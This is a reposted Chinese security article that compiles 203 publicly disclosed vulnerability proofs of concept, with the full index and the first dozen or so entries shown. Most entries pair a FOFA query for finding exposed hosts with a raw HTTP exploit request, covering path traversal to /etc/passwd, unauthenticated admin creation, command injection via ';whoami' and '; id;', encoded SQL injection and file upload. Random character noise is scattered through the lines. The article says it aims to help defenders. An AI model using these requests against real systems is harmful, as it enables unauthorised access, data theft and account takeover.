互联网公开漏洞整理202309-202406
& n% ^4 r( l% b0 G$ B& W道一安全 2024-06-05 07:41 北京
7 A2 `. L: E& n6 M- Y以下文章来源于网络安全新视界 ,作者网络安全新视界
0 y& J& E! `# M9 c. o# O4 O( O: N' U2 H
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。. T/ ^4 x w6 y2 ~( D- i
# S: i8 r/ v! q! f漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
' D# p. s/ `1 m; M9 l8 _! D; ~3 N' a3 ?: E5 t) t8 F
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
6 _6 U! C8 G5 w$ N4 h a5 Y: N' R) e# j* G! M* A
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
' c. M5 y; A& ]2 C( `: W# t, ?4 A* b
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
$ o. `1 Y; q4 o% C2 F7 G
! U* R" z: |" G3 {- w# i% N9 ?6 N$ P7 r H0 N! E
声明
5 x* V! {+ P, w) I, c' u& B8 q7 a: ?! s H! n
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
' G0 X& m0 K: `) i8 o2 o& e' M$ W9 V0 K0 F4 g
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。, T1 H$ ?8 @& w+ k' ^4 E$ @
- S" Z0 P1 t+ v) t8 w8 X& h
( Q/ C2 O$ e2 e6 w7 q
5 W. E& Q% E" N' c
目录
2 B7 j4 }# x: f8 p" a0 I- |7 n# C2 {7 v$ \4 g6 F- |1 p
01
2 K6 @) s) U3 e& ]6 ]) U& F. \1 R3 K, u. I- r7 R, F& |
1. StarRocks MPP数据库未授权访问
; l* K; _; H1 D+ h0 H2. Casdoor系统static任意文件读取
5 \# `. ?3 j0 O7 {. T4 Z3. EasyCVR智能边缘网关 userlist 信息泄漏
4 P! m ~% d9 v4. EasyCVR视频管理平台存在任意用户添加( E9 @' x* x7 S! j/ r1 @1 i
5. NUUO NVR 视频存储管理设备远程命令执行* T& J# W) r {( y
6. 深信服 NGAF 任意文件读取2 K8 C1 D3 V: h+ ~$ u& K/ A
7. 鸿运主动安全监控云平台任意文件下载
8 d& ~6 K; K" g8. 斐讯 Phicomm 路由器RCE& w4 i! b8 r* J: H
9. 稻壳CMS keyword 未授权SQL注入/ N9 z5 E3 U" l! _3 \( d
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
) c" D3 d$ T1 C! V1 \! y7 S11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
' H6 n* P" R K; q- s o12. Jorani < 1.0.2 远程命令执行% D! `7 L5 q% Y7 ^2 f/ |
13. 红帆iOffice ioFileDown任意文件读取( T+ p& q8 \; R+ W& z8 _3 R
14. 华夏ERP(jshERP)敏感信息泄露
# u' @" L* K9 m; B' h15. 华夏ERP getAllList信息泄露- s, S2 Q) A' ]+ H
16. 红帆HFOffice医微云SQL注入
! _7 N+ ~& ]. L1 l4 {- Y17. 大华 DSS itcBulletin SQL 注入
6 {6 M0 R% D1 c$ F# n18. 大华 DSS 数字监控系统 user_edit.action 信息泄露; p; T. E; Z- P" ]" ]% F/ ?( _7 C
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入7 A) I& g: l! M
20. 大华ICC智能物联综合管理平台任意文件读取
# |6 a- j1 L/ F; m3 L& w21. 大华ICC智能物联综合管理平台random远程代码执行
8 G, g9 K+ o. x! a3 \. y; d9 I. D22. 大华ICC智能物联综合管理平台 log4j远程代码执行
. S7 A9 W' o1 ~23. 大华ICC智能物联综合管理平台 fastjson远程代码执行2 n" ^. n0 C2 _& u3 x( X
24. 用友NC 6.5 accept.jsp任意文件上传
* p2 L- j& _1 C25. 用友NC registerServlet JNDI 远程代码执行" W5 ?/ s/ d7 g7 D1 ~1 j' E
26. 用友NC linkVoucher SQL注入
0 V8 t* }& u: h. b- X' D7 x27. 用友 NC showcontent SQL注入$ J' ^ x; F$ R( x8 L, ]- }
28. 用友NC grouptemplet 任意文件上传; a2 ` o% [' P: [& B& ?
29. 用友NC down/bill SQL注入6 P2 S/ L/ X( p2 g
30. 用友NC importPml SQL注入" s1 ?# V2 Q: d% @
31. 用友NC runStateServlet SQL注入
+ F1 | d- ?* G32. 用友NC complainbilldetail SQL注入
3 y9 V3 K4 u$ Q/ w' r33. 用友NC downTax/download SQL注入) n& E$ }7 a6 ?/ I
34. 用友NC warningDetailInfo接口SQL注入
4 N4 u: Q- G6 ~5 W35. 用友NC-Cloud importhttpscer任意文件上传" U- M( H4 i! q) b6 s
36. 用友NC-Cloud soapFormat XXE
: x1 _1 o5 s' e: R5 S2 h) ^% m37. 用友NC-Cloud IUpdateService XXE
* b7 Q* `' V5 U4 {0 p Z$ F0 F9 Y$ [4 O# N38. 用友U8 Cloud smartweb2.RPC.d XXE: C7 J" g. D" v: ^0 l
39. 用友U8 Cloud RegisterServlet SQL注入
8 X% o) G- }4 b- c! T40. 用友U8-Cloud XChangeServlet XXE4 Y6 E* d- k/ q
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入% @; G5 x( J5 m; [, h- p( R
42. 用友GRP-U8 SmartUpload01 文件上传
( u" h s! S5 Q4 `/ F( v+ z: \8 O! y43. 用友GRP-U8 userInfoWeb SQL注入致RCE2 U( c$ v. c" e& h' \0 ]2 p
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
7 i- f8 v: U8 P4 O/ W( a45. 用友GRP-U8 ufgovbank XXE: D2 R6 n& J' E' r- ?( u
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
, O$ O$ O+ a1 e1 v$ t: l1 X47. 用友GRP A++Cloud 政府财务云 任意文件读取! U# |4 K: B% d; b* X
48. 用友U8 CRM swfupload 任意文件上传
) H, [& Y! H& ?8 u0 A49. 用友U8 CRM系统uploadfile.php接口任意文件上传
- W2 r) w- B' A) }" m50. QDocs Smart School 6.4.1 filterRecords SQL注入
+ I" k5 H w0 f6 L. ?: M51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
3 d# V+ ?( T Q* A52. 泛微E-Office json_common.php sql注入0 a! e' W* T# V/ Y
53. 迪普 DPTech VPN Service 任意文件上传9 e" o* l% C; \& d9 @$ u
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
( f; t: I- P- y D8 q55. 畅捷通T+ getdecallusers信息泄露* O4 p1 G- \! Q
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE+ E9 P, }0 b- Z( X9 u0 l
57. 畅捷通T+ keyEdit.aspx SQL注入7 ]+ h/ g( Q4 z4 `0 K0 W
58. 畅捷通T+ KeyInfoList.aspx sql注入
1 N. Q9 V' p1 O# Y* y59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
; J& j6 x) _2 _# ~6 O60. 百卓Smart管理平台 importexport.php SQL注入
9 [8 P- J y, Z6 K" d61. 浙大恩特客户资源管理系统 fileupload 任意文件上传( N: F* z7 `, ?& l0 L1 H& ^
62. IP-guard WebServer 远程命令执行
8 Z$ n- J0 s, K- j; f7 p9 z% M63. IP-guard WebServer任意文件读取* j/ k( A2 a% @
64. 捷诚管理信息系统CWSFinanceCommon SQL注入6 j% w4 \7 J6 r/ p4 o& K; K
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
9 K3 B: u* D( Y! x# M7 p66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
% U5 a, l7 U7 w2 L( V$ H1 Z3 V67. 万户ezOFFICE wpsservlet任意文件上传0 j- ^+ v, D: C) ?
68. 万户ezOFFICE wf_printnum.jsp SQL注入( @$ z) l' G3 e
69. 万户 ezOFFICE contract_gd.jsp SQL注入/ c8 c+ Z7 g& }) d0 i: ^3 C8 M0 F
70. 万户ezEIP success 命令执行
& D+ J G3 h; \( g2 P. Q71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入1 a6 t' S# i! V+ O8 I
72. 致远OA getAjaxDataServlet XXE3 v0 w |2 ~! H# {8 R5 O
73. GeoServer wms远程代码执行2 x, g- {) M- g ~
74. 致远M3-server 6_1sp1 反序列化RCE7 o2 O5 x9 b, E
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE! P' f) w# n! e) P) S8 D, M
76. 新开普掌上校园服务管理平台service.action远程命令执行
% Z+ c) w: ]7 a) M77. F22服装管理软件系统UploadHandler.ashx任意文件上传
( y9 K5 V" u( Q0 W2 @78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
9 ~3 ~3 P) l$ O& k& z: b. i79. BYTEVALUE 百为流控路由器远程命令执行, v( ?# W7 f* d# @. V
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传4 R3 A/ K3 ~# F3 e# E! o- b* K
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
" ]. [3 `6 j$ l* q& a82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
8 w- T* A3 V; O2 c9 {2 F83. JeecgBoot testConnection 远程命令执行/ q& i |) w$ h6 q
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入. b% U0 ~; S4 V; T
85. SysAid On-premise< 23.3.36远程代码执行5 F. t4 c, Q/ y
86. 日本tosei自助洗衣机RCE
2 L& R0 \, d8 |: B) ]2 U87. 安恒明御安全网关aaa_local_web_preview文件上传1 m' k* O( k/ j. ?7 i- k; D* X
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
1 A2 g1 u' W; ?% `- T0 Y89. 致远互联FE协作办公平台editflow_manager存在sql注入$ v8 Q9 H3 ^# Z5 F! K
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行: R" n# d2 D: v: M7 l
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取 s5 g7 u! R6 h( e' Q
92. 海康威视运行管理中心session命令执行- g4 g, u( t0 N5 H+ Y, O6 x$ {
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
0 ?: C1 Q9 J3 w94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传8 R; d, W5 C9 a* d* x$ W' U! P5 r
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行+ z! j9 v B5 _5 t" Q; Q: t# L6 S3 u$ p
96. Apache OFBiz 18.12.11 groovy 远程代码执行8 K: C6 ~3 [! V6 A! a# k
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行5 S7 }; a' ?. u+ q* ^2 x
98. SpiderFlow爬虫平台远程命令执行2 I( j) s* W1 [1 k) i' s
99. Ncast盈可视高清智能录播系统busiFacade RCE
) U2 p$ S7 a* _8 j! V7 R100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
+ D }' _* Q7 N1 g$ I101. ivanti policy secure-22.6命令注入
7 M4 p& u5 ` e2 R8 U& \; N102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行 @& e" R0 g5 k' a4 ^- ~8 L
103. Ivanti Pulse Connect Secure VPN XXE
' z7 w/ d: G% q% g( X7 g104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
4 R! r: j, R7 M$ A105. SpringBlade v3.2.0 export-user SQL 注入9 W& f! b1 z& Y
106. SpringBlade dict-biz/list SQL 注入
1 `7 Y/ d2 P' q9 @107. SpringBlade tenant/list SQL 注入$ V& t& E k; R9 x5 J
108. D-Tale 3.9.0 SSRF+ B+ D& R: K7 L# K+ A( l: K& X
109. Jenkins CLI 任意文件读取
5 i6 k6 `, O: G* j2 q110. Goanywhere MFT 未授权创建管理员 D3 Y; ?$ M$ j2 E3 V7 R
111. WordPress Plugin HTML5 Video Player SQL注入
+ ?% B; @! h8 A( q# u6 \112. WordPress Plugin NotificationX SQL 注入
" {9 I1 ^& L1 U5 R113. WordPress Automatic 插件任意文件下载和SSRF
]( Q+ @( J, }114. WordPress MasterStudy LMS插件 SQL注入, C; e/ [2 N# R/ I( i
115. WordPress Bricks Builder <= 1.9.6 RCE
. g9 Y( U; C0 f116. wordpress js-support-ticket文件上传
3 P) M' D4 |- C' C) [* G* j0 j117. WordPress LayerSlider插件SQL注入2 y x9 L/ z& M" c! \% j/ y
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传. F; W4 e) a0 |' b8 h
119. 北京百绰智能S20后台sysmanageajax.php sql注入
- Y& `* f9 m+ k120. 北京百绰智能S40管理平台导入web.php任意文件上传$ Y: c0 o$ ?# Q2 Z: s' K8 X- p
121. 北京百绰智能S42管理平台userattestation.php任意文件上传5 v0 B( [& N9 h; o8 i; B
122. 北京百绰智能s200管理平台/importexport.php sql注入9 P3 E2 w! O: V) d3 i# K/ ^
123. Atlassian Confluence 模板注入代码执行2 c( h; V2 Q) l/ A* N2 a9 j V
124. 湖南建研工程质量检测系统任意文件上传5 E* D$ p, n/ O1 v# b
125. ConnectWise ScreenConnect身份验证绕过
1 j. F% Z- ?2 u" i ?! ~) V& U2 Q126. Aiohttp 路径遍历
: |* C& u0 n, _% j127. 广联达Linkworks DataExchange.ashx XXE
9 l( C8 P( u5 \, f* j128. Adobe ColdFusion 反序列化
; ]9 M3 @3 b n& s% D! ^" F129. Adobe ColdFusion 任意文件读取
2 |+ E3 b8 l, q8 `130. Laykefu客服系统任意文件上传
% [+ v; `' f% l1 m3 N0 T- ]9 N131. Mini-Tmall <=20231017 SQL注入
; e; `6 Z* H% L( D' r1 i. @6 F( p132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
& k+ W \: ?6 \) s9 N9 _' l133. H5 云商城 file.php 文件上传: Q* p$ [( I- t1 y. j
134. 网康NS-ASG应用安全网关index.php sql注入
; e! D6 Z2 O0 g! R* @* O, S135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
* U9 \: T5 ~: s! G: U0 I136. NextChat cors SSRF U& D% y) h9 `4 x; Q
137. 福建科立迅通信指挥调度平台down_file.php sql注入( x* f$ i9 S8 Y; A" R
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入0 r1 j$ N% I2 t, ^: ?
139. 福建科立讯通信指挥调度平台editemedia.php sql注入/ P! `7 N0 F) A% f$ e7 Q% Z
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
! R- N# M) T. Z" N141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入: |. @8 F0 W! e
142. CMSV6车辆监控平台系统中存在弱密码% I1 n( S- r( ? v( E6 `
143. Netis WF2780 v2.1.40144 远程命令执行
& u5 b0 W. [. x" W" T! I# l2 J144. D-Link nas_sharing.cgi 命令注入& U& @; p+ b% M/ S( G7 Y) k
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
% r; ^' T2 l4 I1 S5 H1 K% E7 B3 S146. MajorDoMo thumb.php 未授权远程代码执行
/ l8 i o% Z" q0 N8 F7 S- n147. RaidenMAILD邮件服务器v.4.9.4-路径遍历6 r; g6 O$ X. `
148. CrushFTP 认证绕过模板注入* _) w+ q2 m% a. @( h0 U' ]
149. AJ-Report开源数据大屏存在远程命令执行1 Y1 z5 r/ f; e9 \4 A' W- y/ B
150. AJ-Report 1.4.0 认证绕过与远程代码执行4 i2 H7 e; v4 h+ M! D# E
151. AJ-Report 1.4.1 pageList sql注入
, v( f; ~4 U8 X152. Progress Kemp LoadMaster 远程命令执行8 p. H3 }; M( o' a5 v
153. gradio任意文件读取4 o/ n# g/ p7 t! y L
154. 天维尔消防救援作战调度平台 SQL注入# J& U6 R+ j2 E1 \$ @' ~7 h. ]2 C
155. 六零导航页 file.php 任意文件上传
. H' i( e x1 L156. TBK DVR-4104/DVR-4216 操作系统命令注入* ?8 `! k* S) U* J3 s- \( n
157. 美特CRM upload.jsp 任意文件上传+ d; F& s* b; W5 P3 X0 r
158. Mura-CMS-processAsyncObject存在SQL注入; }* I# M1 {8 }6 Z
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
9 {. \- o7 Z& M+ U7 Z160. Sonatype Nexus Repository 3目录遍历与文件读取& Y1 G5 T: o/ Q
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传% k, j6 b/ g& H7 K/ t2 `
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
- ^. M" e7 u+ {8 } @1 }163. 号卡极团分销管理系统 ue_serve.php 任意文件上传2 T k) ]1 }, T: e
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
* P% V9 v0 [1 ~" |0 w" R1 K' b165. OrangeHRM 3.3.3 SQL 注入' L5 m* k% ?) T" O+ k ?9 ~1 K2 a. o
166. 中成科信票务管理平台SeatMapHandler SQL注入8 p4 l/ i+ f. |5 Z( j! q
167. 精益价值管理系统 DownLoad.aspx任意文件读取
6 X* x: B1 M# |7 I1 i168. 宏景EHR OutputCode 任意文件读取
1 s8 J# }% R0 ]: M169. 宏景EHR downlawbase SQL注入 C- P3 q1 S6 g! h) X0 E
170. 宏景EHR DisplayExcelCustomReport 任意文件读取8 c0 X/ h+ A1 k
171. 通天星CMSV6车载定位监控平台 SQL注入- a; O$ ?) [1 V, y( F/ A' k
172. DT-高清车牌识别摄像机任意文件读取
b M4 `- T/ t9 F9 ?2 U0 G173. Check Point 安全网关任意文件读取
* r5 y0 F+ y+ {4 F+ a! l" p174. 金和OA C6 FileDownLoad.aspx 任意文件读取
4 j/ E% Q. Q# W7 l175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
/ T+ c. f v9 d5 B7 Q; V9 q# v176. 电信网关配置管理系统 rewrite.php 文件上传+ R$ j8 P) n4 y8 Q9 Z2 r+ e
177. H3C路由器敏感信息泄露+ ^: ~ ?' p H; k
178. H3C校园网自助服务系统-flexfileupload-任意文件上传) u( @& h# v0 C
179. 建文工程管理系统存在任意文件读取
; m: N2 G% B/ C: L: ~0 d8 v0 o180. 帮管客 CRM jiliyu SQL注入
& @2 ?7 H/ D( @. _7 g* {181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入/ B3 p' V( p( J/ d6 h# z
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
L; W5 w' Z* X; ^! o/ S0 `; W183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
# f& E6 x' a# n4 m184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
8 J# n; ]6 g& |3 g7 e0 S2 |# u. ?) o185. 瑞友天翼应用虚拟化系统SQL注入
- {( G# A0 j' ^. t- l186. F-logic DataCube3 SQL注入
/ h5 L$ ?% x7 l; A$ W; V1 c) n4 G187. Mura CMS processAsyncObject SQL注入
, ^& E7 b- l6 c# {7 c; z188. 叁体-佳会视频会议 attachment 任意文件读取) }8 L: F$ d) F' J+ X: A+ w
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
3 x/ _) @* `; K6 C1 y% N1 ?190. 短视频矩阵营销系统 poihuoqu 任意文件读取
% O( b2 W/ ]# d' N6 K( W191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
* m# D: }, ~& ?% z% q/ s192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
+ f2 T; ?) O0 P6 Z9 V0 ?8 d( p193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行4 g! S4 p+ {9 B3 G( L Q5 p! T5 _% k
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
" h9 ]8 S) y1 Q! n: _ {4 x u# G195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
4 a8 ?8 S! o: u; }196. 河南省风速科技统一认证平台密码重置
' z2 B4 x1 O3 N3 d- ~( {197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
9 K0 _: v9 r2 B5 n; c8 Z; y1 K198. 阿里云盘 WebDAV 命令注入
' d! w% z. u" A$ d* v199. cockpit系统assetsmanager_upload接口 文件上传
3 F. G9 ]# [8 K4 W5 {200. SeaCMS海洋影视管理系统dmku SQL注入# V) M$ M8 x [ s
201. 方正全媒体新闻采编系统 binary SQL注入* A6 S3 |, b, |/ B% H
202. 微擎系统 AccountEdit任意文件上传/ y$ j" U& S% D' u' a4 x
203. 红海云EHR PtFjk 文件上传* J6 T: x) q, p( |( N) s' i; \
) [' k" a0 B( e0 a! iPOC列表
1 K0 Z1 [0 ? u8 w h; a
1 P c. N; t$ |3 \4 A; u02: l- _ @0 x4 @7 C+ d! u. e
* j/ o' P. }6 b
1. StarRocks MPP数据库未授权访问3 ~; m, I4 c% A$ l
FOFA :title="StarRocks"* N. }/ F5 C8 w. K& i) G
GET /mem_tracker HTTP/1.1, X, g; N- w6 h, I
Host: URL* d: J6 J$ q5 G. W9 n
! }7 m; {6 u8 C0 `7 w3 }+ \+ v) U, @* e6 ?, v0 Z
2. Casdoor系统static任意文件读取" C; }- U! y% Y. S/ R
FOFA :title="Casdoor"
' V3 X8 U! ]5 H$ h/ w! @; l+ vGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
5 F: c7 ]9 ?6 l, M3 k; l) _Host: xx.xx.xx.xx:9999
* k# h* \0 l, A% MUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.369 ^, ^; e0 b/ b: p0 F* t, `
Connection: close0 H* Y% ]+ k8 V2 j4 I# ^
Accept: */*! M! N5 V; q$ y, l$ ~
Accept-Language: en4 J" d! w, ~/ G5 g
Accept-Encoding: gzip. ?$ I/ P! _% X: t$ I
2 B$ y. ^% M. R! |" g3 q8 x" ?
~/ ]6 {- a+ o7 q" L7 L
3. EasyCVR智能边缘网关 userlist 信息泄漏: a" W+ E: r4 E) }* j
FOFA :title="EasyCVR"
2 q% W6 A* R6 ^' ?1 ~1 R; aGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
0 e) ?4 Y+ _# S E8 n1 p; oHost: xx.xx.xx.xx, e3 @( ]& B& Z! ^+ J( w
" l2 G, n9 L0 a2 P+ q
6 ? ~% U- F1 s3 L2 ?/ X4 n- I9 Y& j4. EasyCVR视频管理平台存在任意用户添加
) s7 x+ u) ]* s: PFOFA :title="EasyCVR"
1 ~" G" J! \( f% h! Q" l7 F7 M2 N: x3 L% Z/ J7 Y+ f1 S2 ^# k6 |
password更改为自己的密码md5' f; b- M: m1 {) ~0 Y/ Z
POST /api/v1/adduser HTTP/1.14 r+ t" Y/ ~% k1 [- x5 f
Host: your-ip# D2 D0 \; u$ c3 A/ J
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
0 A. `& k6 w8 v: p# @: y6 Q& t0 I
, |1 [0 o8 Q" Q5 z) {. H+ H. rname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=15 K) o) Z- O9 p9 F
8 r$ f% x/ O/ R% r! s6 p
! ]; A5 f$ y: P2 Z4 z/ S) J5. NUUO NVR 视频存储管理设备远程命令执行& q- W$ g( @8 q' X6 p9 i) L
FOFA:title="Network Video Recorder Login"
3 F2 e. J% M# O9 t/ sGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
5 L( r) i. R# G. ^# SHost: xx.xx.xx.xx3 Q6 V. w' O9 K7 X0 @* v2 g
t i7 w$ A X* n( c' B
4 }5 {0 Y( ?! x9 e- G1 s4 }6 q
6. 深信服 NGAF 任意文件读取8 v/ u* F/ f" N1 l$ \& x0 G+ M
FOFA:title="SANGFOR | NGAF"( i/ a6 b) M. E6 w3 P+ p! f8 C" H' O
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
: m; B4 V' ~' l5 S1 g$ m" @Host:$ S* `* V4 c4 T- h
- g7 Y# I: p& |' z3 m& X
! K8 h' f6 ]" ]8 i8 H5 g7. 鸿运主动安全监控云平台任意文件下载% C. R* V7 f. I: U; ]4 p
FOFA:body="./open/webApi.html"3 S! m9 e9 r# Q& F6 D( m
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
4 {2 S, j8 p( O! {Host:; y4 {) N5 A4 h6 q+ {. B9 l$ r
6 ]$ i3 F. d3 d- I+ G, w( ~; g+ l+ P: w
. S7 W* z! E, X) i8 {, u7 {5 x8. 斐讯 Phicomm 路由器RCE( r' ]; G/ X* W: p
FOFA:icon_hash="-1344736688"* P" X$ X, v O5 N% B
默认账号admin登录后台后,执行操作& U* F% [2 g( M2 I+ ~5 b: D
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
/ i( L8 m% ] X. _Host: x.x.x.x
( e! A7 d4 l0 f! w% S6 {Cookie: sysauth=第一步登录获取的cookie$ p) }; v& T6 e& u2 u% z4 s
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
2 [, ~4 G* i% d( T" wUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
" \* F5 u% \0 h5 {% g R
, C- B. [3 x8 l------WebKitFormBoundaryxbgjoytz
5 c; w+ N) ^0 m& _Content-Disposition: form-data; name="wifiRebootEnablestatus"2 B3 G1 a+ @: h+ ]2 A
2 q, z" j& o4 m9 Q1 ]
%s
3 X7 N) r* A' s$ v! c------WebKitFormBoundaryxbgjoytz
6 b, j% f5 E' a0 F! [Content-Disposition: form-data; name="wifiRebootrange"! R5 D# d+ o6 ]7 G( ]
* j# V' K1 o' P a$ H12:00; id;; A5 F0 Z( [" Y6 R7 v
------WebKitFormBoundaryxbgjoytz) S. f" D" i$ P+ o6 V. f' ]
Content-Disposition: form-data; name="wifiRebootendrange"
* A1 b1 v+ a: r$ `# B4 E* Q/ I
, J) s4 i4 n" P" q2 T%s:
; |2 p* Q4 Z+ |# F# E$ T------WebKitFormBoundaryxbgjoytz+ c1 k4 O3 l: R, G$ J: F
Content-Disposition: form-data; name="cururl2"
( E: X! T3 p8 B; ]7 U: i) h* V" [3 _ z
! ?. ?. W: l+ F2 w
------WebKitFormBoundaryxbgjoytz--
* W. T6 q$ |$ q: W& k
: h! S9 d6 f1 \ M
* ]3 v2 {( [* O+ F9. 稻壳CMS keyword 未授权SQL注入5 ?- V, q/ k4 P8 ^! F
FOFA:app="Doccms"1 r! ^6 Z4 D2 \
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1) e1 m6 U% ~' ~* i! f. I
Host: x.x.x.x! Z, A: u' z$ f; {5 r
9 f1 ~% b; s# R7 {6 y/ b: r+ Z/ Y& \# ]7 Q3 ~9 F y
payload为下列语句的二次Url编码
1 c! @& V5 }. I4 T) q( p% q( v' b% E/ X
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))# U' x& d! a+ R8 N: e+ G
) t9 ` H# P. H d8 k/ t* `
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传' n7 a+ |' B( I9 J9 I
FOFA:icon_hash="953405444"1 H5 p6 A2 b ?0 b3 n1 X
# d: H6 f# K) }* w5 i5 h
文件上传后响应中包含上传文件的路径9 {" Q1 p1 x) L( q1 ~
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
) w: B0 z+ x) D1 U" |* mHost: x.x.x.x:xx
# v* K2 l6 d1 n- `( f" n; IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
2 R6 C- i! K% nContent-Length: 1976 t/ j- P8 X$ H) B: _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9/ e. a' X. b% {5 C/ H* }# c) \
Accept-Encoding: gzip, deflate( q( i" G! y2 s3 w" _4 P: U
Accept-Language: zh-CN,zh;q=0.9
3 h2 v- f4 V) p- c( O% f0 sConnection: close
# ]& N; F* u& p; f- f8 s; c; HContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu' j+ O( S G1 L( x
" P6 j/ j3 g0 l; v# [------WebKitFormBoundaryxdgaqmqu' K& P4 x% f( J# P. K" G( d
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
: c* B) y* F7 i7 M4 ]4 }# Y4 SContent-Type: text/html
: D; k7 c- [5 u
6 X3 U0 U/ E) X% H5 C6 k3 X5 ~( Ejmnqjfdsupxgfidopeixbgsxbf4 e7 |& ?$ t* W4 X( l9 s
------WebKitFormBoundaryxdgaqmqu--1 P$ n" L/ v, U" r( x! D' T
' d% _' c9 d9 x# ?/ B! N
8 V0 n# T0 k; T0 k) T5 }11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入2 n9 m) q* U' U) N- E
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
